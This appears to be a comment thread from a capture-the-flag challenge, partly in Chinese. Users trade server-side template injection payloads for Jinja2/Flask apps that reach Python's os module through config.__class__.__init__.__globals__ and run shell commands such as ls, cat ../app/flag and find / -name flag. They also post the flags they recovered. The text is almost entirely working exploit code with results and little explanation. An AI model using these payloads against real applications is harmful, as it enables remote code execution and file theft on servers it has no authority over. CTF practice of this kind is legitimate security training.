{{ config.__class__.__init__.__globals__['os'].popen('ls ../').read() }} {{ config.__class__.__init__.__globals__['os'].popen('ls ../app').read() }}
/?flag={{config.__class__.__init__.__globals__['os'].popen('cat ../app/flag').read()}}
flag{ffb1bde14170624274f424caf4406a1a}
SSTI模版注入:?flag={{config.__class__.__init__.__globals__['os'].popen('ls').read()}},拓展?flag={{config.__class__.__init__.__globals__['os'].popen('cat../app/flag').read()}}
题解详细步骤:http://t.csdnimg.cn/yZlnn
好用,谢谢
flag{f231bce175908e8fec554031a6232a55}
flag{c75b03620c73371a0e8f249354e0bd57} ?flag={{ config.__class__.__init__.__globals__['os'].popen('cat ../app/flag').read() }}即可
是这个flag{561f38d2a44d42ca8847575a2e144b2b} so easy
{{config.__class__.__init__.__globals__['os'].popen('find / -name flag').read()}} {{config.__class__.__init__.__globals__['os'].popen('cat /app/flag').read()}}
flag{2682096b09e88fe5f1faee731c0d36d7}